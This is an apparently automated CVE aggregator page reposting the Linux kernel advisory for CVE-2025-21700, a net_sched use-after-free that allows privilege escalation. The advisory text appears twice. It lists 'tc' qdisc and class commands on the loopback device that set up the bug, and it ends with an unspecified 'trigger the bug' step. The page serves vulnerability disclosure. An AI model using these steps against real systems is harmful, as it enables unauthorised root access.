CVE & Vulnerability

CVE-2025-21700 - Linux Kernel Net_sched UAF Privilege Escalation

CVE ID : CVE-2025-21700 Published : Feb. 13, 2025, 12:15 p.m. | 29 minutes ago Description : In the Linux kernel, the following vulnerability has been resolved: net: sched: Disallow replacing of child qdisc from one parent to another Lion Ackermann was able to create a UAF which can be abused for privilege escalation with the following script Step 1. create root qdisc tc qdisc add dev lo root handle 1:0 drr step2. a class for packet aggregation do demonstrate uaf tc class add dev lo classid 1:1 drr step3. a class for nesting tc class add dev lo classid 1:2 drr step4. a class to graft qdisc to tc class add dev lo classid 1:3 drr step5. tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024 step6. tc qdisc add dev lo parent 1:2 handle 3:0 drr step7. tc class add dev lo classid 3:1 drr step 8. tc qdisc add dev lo parent 3:1 handle 4:0 pfifo step 9. Display the class/qdisc layout tc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 limit 1000p qdisc drr 3: dev lo parent 1:2 step10. trigger the bug Severity: 0.0 | NA Visit the link for more details, such as CVSS details, affected products, timeline, and more...

AutorAutor
Feb 13, 2025 - 13:45
 0  0
CVE-2025-21700 - Linux Kernel Net_sched UAF Privilege Escalation
CVE ID : CVE-2025-21700
Published : Feb. 13, 2025, 12:15 p.m. | 29 minutes ago
Description : In the Linux kernel, the following vulnerability has been resolved: net: sched: Disallow replacing of child qdisc from one parent to another Lion Ackermann was able to create a UAF which can be abused for privilege escalation with the following script Step 1. create root qdisc tc qdisc add dev lo root handle 1:0 drr step2. a class for packet aggregation do demonstrate uaf tc class add dev lo classid 1:1 drr step3. a class for nesting tc class add dev lo classid 1:2 drr step4. a class to graft qdisc to tc class add dev lo classid 1:3 drr step5. tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024 step6. tc qdisc add dev lo parent 1:2 handle 3:0 drr step7. tc class add dev lo classid 3:1 drr step 8. tc qdisc add dev lo parent 3:1 handle 4:0 pfifo step 9. Display the class/qdisc layout tc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kb tc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 limit 1000p qdisc drr 3: dev lo parent 1:2 step10. trigger the bug
Severity: 0.0 | NA
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
Read More

Tags:

Vorheriger Artikel

Hohe Preise für Strom und Gas: Jeder Fünfte in Deutschland kämpft mit Energiekosten

Nächster Artikel

CVE-2024-13606 - WordPress JS Help Desk Sensitive Information Exposure

Autor
Autor

Verwandte Beiträge

CVE-2024-53484 - Ever Traduora 0.20.0 and below is vulnerable to Pr

CVE-2024-53484 - Ever Traduora 0.20.0 and below is vuln...

Autor Dez 2, 2024  0  2

CVE-2024-57611 - FLYCMS CSRF Vulnerability

CVE-2024-57611 - FLYCMS CSRF Vulnerability

Autor Jan 16, 2025  0  2

CVE-2024-38788 - UiPress Lite SQL Injection

CVE-2024-38788 - UiPress Lite SQL Injection

Autor Jul 22, 2024  0  2